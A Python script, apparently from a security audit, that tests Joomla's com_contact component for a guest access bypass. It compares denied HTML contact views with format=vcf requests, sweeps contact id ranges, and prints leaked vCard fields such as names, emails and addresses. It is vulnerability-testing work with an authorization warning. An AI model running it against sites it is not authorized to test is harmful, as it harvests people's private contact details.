#!/usr/bin/env python3
"""
Check REPORTABLE-04: Joomla com_contact guest vCard access bypass.

Use only against Joomla instances you own or are explicitly authorized to test.
The strongest signal is:

  HTML contact view returns 401/403, but the same contact with format=vcf
  returns HTTP 200 and a BEGIN:VCARD body.
"""

from __future__ import annotations

import argparse
import html
import json
import re
import ssl
import sys
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass
from typing import Iterable


DEFAULT_USER_AGENT = "reportable-04-vcf-check/1.0"
VCARD_FIELDS_TO_PRINT = ("FN", "N", "TITLE", "TEL", "ADR", "EMAIL", "URL", "ORG")
JSONLD_TYPES_OF_INTEREST = {"Person", "ContactPoint"}
DENIED_STATUSES = {401, 403}


@dataclass
class Response:
    url: str
    status: int
    headers: dict[str, str]
    body: bytes
    error: str | None = None

    @property
    def text(self) -> str:
        content_type = self.headers.get("content-type", "")
        charset = "utf-8"
        match = re.search(r"charset=([^\s;]+)", content_type, flags=re.I)
        if match:
            charset = match.group(1).strip("\"'")

        try:
            return self.body.decode(charset, errors="replace")
        except LookupError:
            return self.body.decode("utf-8", errors="replace")


@dataclass
class CheckResult:
    contact_id: int
    html_response: Response
    vcf_response: Response
    vcard_fields: list[tuple[str, str]]
    html_vcf_link_present: bool
    jsonld_hits: list[str]
    expected_hits_html: list[str]
    expected_hits_vcf: list[str]

    @property
    def vcf_is_vcard(self) -> bool:
        return bool(self.vcard_fields) and "BEGIN:VCARD" in self.vcf_response.text.upper()

    @property
    def denied_html_allowed_vcf(self) -> bool:
        return self.html_response.status in DENIED_STATUSES and self.vcf_response.status == 200 and self.vcf_is_vcard

    @property
    def direct_vcf_without_html_link(self) -> bool:
        return (
            self.html_response.status == 200
            and self.vcf_response.status == 200
            and self.vcf_is_vcard
            and not self.html_vcf_link_present
        )

    @property
    def jsonld_leak_on_denied_html(self) -> bool:
        return self.html_response.status in DENIED_STATUSES and bool(self.jsonld_hits)


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="Check Joomla REPORTABLE-04 com_contact format=vcf guest access bypass.",
        epilog=(
            "Examples:\n"
            "  python3 audit/reportable_04_vcf_bypass_check.py http://127.0.0.1:103 --id 2\n"
            "  python3 audit/reportable_04_vcf_bypass_check.py http://192.168.1.25 --range 1-20 --expect private@example.test"
        ),
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument("base_url", help="Base Joomla URL, for example http://127.0.0.1:103 or http://host/joomla")
    parser.add_argument("--id", dest="ids", action="append", type=int, help="Contact id to test. Can be repeated.")
    parser.add_argument("--range", dest="ranges", action="append", help="Inclusive contact id range, for example 1-20.")
    parser.add_argument(
        "--expect",
        dest="expected",
        action="append",
        default=[],
        help="Sensitive string expected in leaked output, such as a private contact name or email. Can be repeated.",
    )
    parser.add_argument("--timeout", type=float, default=10.0, help="HTTP timeout in seconds. Default: 10.")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification.")
    parser.add_argument("--user-agent", default=DEFAULT_USER_AGENT, help=f"User-Agent header. Default: {DEFAULT_USER_AGENT}")
    parser.add_argument("--show-body", action="store_true", help="Print the full returned vCard body for positive findings.")
    parser.add_argument(
        "--max-ids",
        type=int,
        default=200,
        help="Safety cap for total tested contact ids when using ranges. Default: 200.",
    )
    return parser.parse_args()


def normalize_base_url(base_url: str) -> str:
    parsed = urllib.parse.urlparse(base_url)
    if not parsed.scheme:
        base_url = "http://" + base_url
        parsed = urllib.parse.urlparse(base_url)
    if parsed.scheme not in {"http", "https"}:
        raise ValueError("base_url must use http or https")
    return base_url.rstrip("/") + "/"


def parse_ranges(range_args: Iterable[str] | None) -> list[int]:
    ids: list[int] = []
    for value in range_args or []:
        match = re.fullmatch(r"\s*(\d+)\s*-\s*(\d+)\s*", value)
        if not match:
            raise ValueError(f"invalid --range value {value!r}; expected START-END")
        start, end = int(match.group(1)), int(match.group(2))
        if start > end:
            start, end = end, start
        ids.extend(range(start, end + 1))
    return ids


def build_contact_url(base_url: str, contact_id: int, *, vcf: bool = False) -> str:
    params = {
        "option": "com_contact",
        "view": "contact",
        "id": str(contact_id),
    }
    if vcf:
        params["format"] = "vcf"

    index_url = urllib.parse.urljoin(base_url, "index.php")
    return index_url + "?" + urllib.parse.urlencode(params)


def fetch(url: str, *, timeout: float, user_agent: str, context: ssl.SSLContext | None) -> Response:
    request = urllib.request.Request(
        url,
        headers={
            "User-Agent": user_agent,
            "Accept": "*/*",
        },
    )

    try:
        with urllib.request.urlopen(request, timeout=timeout, context=context) as response:
            return Response(
                url=response.geturl(),
                status=response.status,
                headers={k.lower(): v for k, v in response.headers.items()},
                body=response.read(),
            )
    except urllib.error.HTTPError as exc:
        return Response(
            url=exc.geturl(),
            status=exc.code,
            headers={k.lower(): v for k, v in exc.headers.items()},
            body=exc.read(),
        )
    except urllib.error.URLError as exc:
        return Response(url=url, status=0, headers={}, body=b"", error=str(exc.reason))
    except TimeoutError as exc:
        return Response(url=url, status=0, headers={}, body=b"", error=str(exc))


def unfold_vcard(text: str) -> list[str]:
    normalized = text.replace("\r\n", "\n").replace("\r", "\n")
    lines: list[str] = []
    for line in normalized.split("\n"):
        if line.startswith((" ", "\t")) and lines:
            lines[-1] += line[1:]
        else:
            lines.append(line)
    return lines


def parse_vcard_fields(text: str) -> list[tuple[str, str]]:
    fields: list[tuple[str, str]] = []
    upper_text = text.upper()
    if "BEGIN:VCARD" not in upper_text or "END:VCARD" not in upper_text:
        return fields

    for line in unfold_vcard(text):
        if ":" not in line:
            continue
        raw_key, raw_value = line.split(":", 1)
        key = raw_key.split(";", 1)[0].upper()
        if key in VCARD_FIELDS_TO_PRINT:
            fields.append((raw_key, raw_value.strip()))
    return fields


def html_has_vcf_link(text: str) -> bool:
    unescaped = html.unescape(text)
    return "format=vcf" in unescaped.lower()


def find_jsonld_hits(text: str, expected: list[str]) -> list[str]:
    hits: list[str] = []
    script_pattern = re.compile(
        r"<script\b[^>]*type=[\"']application/ld\+json[\"'][^>]*>(.*?)</script>",
        flags=re.I | re.S,
    )

    for match in script_pattern.finditer(text):
        raw = html.unescape(match.group(1)).strip()
        if not raw:
            continue

        compact = re.sub(r"\s+", " ", raw)
        parsed_types: list[str] = []
        try:
            parsed = json.loads(raw)
            parsed_types = extract_schema_types(parsed)
        except json.JSONDecodeError:
            parsed_types = ["unparsed JSON-LD"]

        interesting = bool(JSONLD_TYPES_OF_INTEREST.intersection(parsed_types))
        expected_match = any(needle and needle in raw for needle in expected)
        if interesting or expected_match:
            summary = ", ".join(parsed_types[:5]) if parsed_types else "JSON-LD"
            if expected_match:
                summary += " containing expected string"
            hits.append(f"{summary}: {interesting_jsonld_snippet(compact, expected)}")
    return hits


def extract_schema_types(value: object) -> list[str]:
    types: list[str] = []

    def walk(item: object) -> None:
        if isinstance(item, dict):
            schema_type = item.get("@type")
            if isinstance(schema_type, str):
                types.append(schema_type)
            elif isinstance(schema_type, list):
                types.extend(str(entry) for entry in schema_type)

            for child in item.values():
                if isinstance(child, (dict, list)):
                    walk(child)
        elif isinstance(item, list):
            for child in item:
                walk(child)

    walk(value)
    return list(dict.fromkeys(types))


def interesting_jsonld_snippet(compact_jsonld: str, expected: list[str]) -> str:
    needles = [needle for needle in expected if needle] + ['"@type":"Person"', '"@type": "Person"', "ContactPoint"]
    for needle in needles:
        pos = compact_jsonld.find(needle)
        if pos >= 0:
            start = max(pos - 80, 0)
            end = min(pos + 180, len(compact_jsonld))
            prefix = "..." if start else ""
            suffix = "..." if end < len(compact_jsonld) else ""
            return prefix + compact_jsonld[start:end] + suffix
    return compact_jsonld[:220]


def find_expected_hits(text: str, expected: list[str]) -> list[str]:
    return [needle for needle in expected if needle and needle in text]


def run_check(
    base_url: str,
    contact_id: int,
    *,
    timeout: float,
    user_agent: str,
    context: ssl.SSLContext | None,
    expected: list[str],
) -> CheckResult:
    html_response = fetch(
        build_contact_url(base_url, contact_id, vcf=False),
        timeout=timeout,
        user_agent=user_agent,
        context=context,
    )
    vcf_response = fetch(
        build_contact_url(base_url, contact_id, vcf=True),
        timeout=timeout,
        user_agent=user_agent,
        context=context,
    )

    html_text = html_response.text
    vcf_text = vcf_response.text

    return CheckResult(
        contact_id=contact_id,
        html_response=html_response,
        vcf_response=vcf_response,
        vcard_fields=parse_vcard_fields(vcf_text),
        html_vcf_link_present=html_has_vcf_link(html_text),
        jsonld_hits=find_jsonld_hits(html_text, expected),
        expected_hits_html=find_expected_hits(html_text, expected),
        expected_hits_vcf=find_expected_hits(vcf_text, expected),
    )


def print_result(result: CheckResult, *, show_body: bool) -> None:
    prefix = f"[contact id {result.contact_id}]"
    html_status = "ERR" if result.html_response.status == 0 else str(result.html_response.status)
    vcf_status = "ERR" if result.vcf_response.status == 0 else str(result.vcf_response.status)
    print(f"{prefix} HTML={html_status} VCF={vcf_status} vcard={'yes' if result.vcf_is_vcard else 'no'}")

    if result.html_response.error:
        print(f"  HTML request error: {result.html_response.error}")
    if result.vcf_response.error:
        print(f"  VCF request error: {result.vcf_response.error}")

    if result.denied_html_allowed_vcf:
        print("  VULNERABLE: guest HTML view is denied, but direct format=vcf returns a vCard.")
    elif result.direct_vcf_without_html_link:
        print("  WARNING: HTML view did not advertise a vCard link, but direct format=vcf returns a vCard.")
    elif result.vcf_response.status == 200 and result.vcf_is_vcard:
        print("  INFO: direct format=vcf returns a vCard. This is not an access bypass unless the contact should be hidden.")
    elif result.vcf_response.status in DENIED_STATUSES:
        print("  OK: direct format=vcf is denied.")
    elif result.html_response.status == 404 and result.vcf_response.status == 404:
        print("  OK: contact was not found in either view.")
    else:
        print("  INCONCLUSIVE: response pattern does not match the reported bypass.")

    if result.expected_hits_vcf:
        print(f"  Expected string(s) in VCF: {', '.join(result.expected_hits_vcf)}")
    if result.expected_hits_html:
        print(f"  Expected string(s) in HTML response: {', '.join(result.expected_hits_html)}")

    if result.jsonld_leak_on_denied_html:
        print("  JSON-LD side leak on denied HTML response:")
        for hit in result.jsonld_hits:
            print(f"    - {hit}")

    if result.vcard_fields:
        print("  VCF fields:")
        for key, value in result.vcard_fields:
            print(f"    {key}: {value}")

    if show_body and result.vcf_is_vcard:
        print("  Full VCF body:")
        for line in result.vcf_response.text.rstrip().splitlines():
            print(f"    {line}")


def main() -> int:
    args = parse_args()

    try:
        base_url = normalize_base_url(args.base_url)
        ids = list(args.ids or [])
        ids.extend(parse_ranges(args.ranges))
    except ValueError as exc:
        print(f"error: {exc}", file=sys.stderr)
        return 1

    ids = sorted(set(ids))
    if not ids:
        print("error: pass at least one --id or --range START-END", file=sys.stderr)
        return 1
    if len(ids) > args.max_ids:
        print(f"error: refusing to test {len(ids)} ids; raise --max-ids if this is intentional", file=sys.stderr)
        return 1

    context = None
    if args.insecure:
        context = ssl._create_unverified_context()

    any_vulnerable = False
    any_inconclusive_error = False

    for contact_id in ids:
        result = run_check(
            base_url,
            contact_id,
            timeout=args.timeout,
            user_agent=args.user_agent,
            context=context,
            expected=args.expected,
        )
        print_result(result, show_body=args.show_body)
        print()

        any_vulnerable = any_vulnerable or result.denied_html_allowed_vcf
        any_inconclusive_error = any_inconclusive_error or result.html_response.status == 0 or result.vcf_response.status == 0

    if any_vulnerable:
        return 2
    if any_inconclusive_error:
        return 1
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
